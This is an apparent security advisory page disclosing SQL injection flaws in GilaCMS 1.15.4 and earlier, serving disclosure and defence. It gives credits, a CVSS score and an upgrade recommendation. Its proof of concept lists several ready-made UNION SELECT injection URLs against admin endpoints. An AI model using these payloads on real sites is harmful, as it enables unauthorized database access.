GilaCMS 1.15.4 SQL Injection

2023.12.24
Credit: Louise Ng
Risk: Medium
Local: No
Remote: Yes
CVE: CVE-2020-26625
CWE: CWE-89

Description: GilaCMS <=1.15.4 - Mutiple SQL injection vulnerabilties Affected CMS: GilaCMS Affected Version: <= 1.15.4 CVE ID: CVE-2020-26623, CVE-2020-26624, CVE-2020-26625 CVSS Score: 7.2 (High) CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H Discoverers: Chris Chan @ UDomain Web Hosting Co.Ltd, Louise Ng @ UDomain Web Hosting Co.Ltd Multiple SQL injection vulnerabilities were discovered in Gila CMS 1.15.4 and before which allows a remote attacker to execute arbitary web scripts. Proof of Concept: Attack Vector 1: After login into admin portal, go to administration>widget and use wiget area filter to perform search Sample payload: http://targeturl/cm/list_rows/widget?page=1&area=dashboard'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,@@version,NULL--%20 Attack Vector 2: After login into admin portal, go to edit post/page/role/user/category/userpost Sample payload: http://targeturl/cm/edit_form/userrole?id=2'%20and%201%3d0%20UNION%20ALL%20SELECT%20@@version,NULL,NULL--%20&callback=g_form_popup_update http://targeturl/cm/edit_form/user?id=1'%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL,NULL,NULL--%20 http://targeturl/cm/edit_form/page?id=7'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20NULL,@@version,NULL,NULL,NULL--%20 http://targeturl/cm/edit_form/post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20%20&callback=g_form_popup_update http://targeturl/cm/edit_form/postcategory?id=11'%20%20and%201%3d0%20UNION%20ALL%20SELECT%20NULL,NULL,@@version--%20&callback=g_form_popup_update http://targeturl/cm/edit_form/user-post?id=3'%20and%201%3d0%20%20UNION%20ALL%20SELECT%20@@version,NULL,NULL,NULL,NULL,NULL,NULL,NULL--%20&callback=g_form_popup_update Attacker Vector 3: After login into admin portal, go to Content>Posts and use Users filter to perform search Sample payload: http://targeturl/cm/list_rows/post?page=1&user_id=1'%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,@@version,NULL--%20 Recommendation Update to v2.0.1 http://gilacms.com https://github.com/GilaCMS/gila https://github.com/GilaCMS/gila/security/policy


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top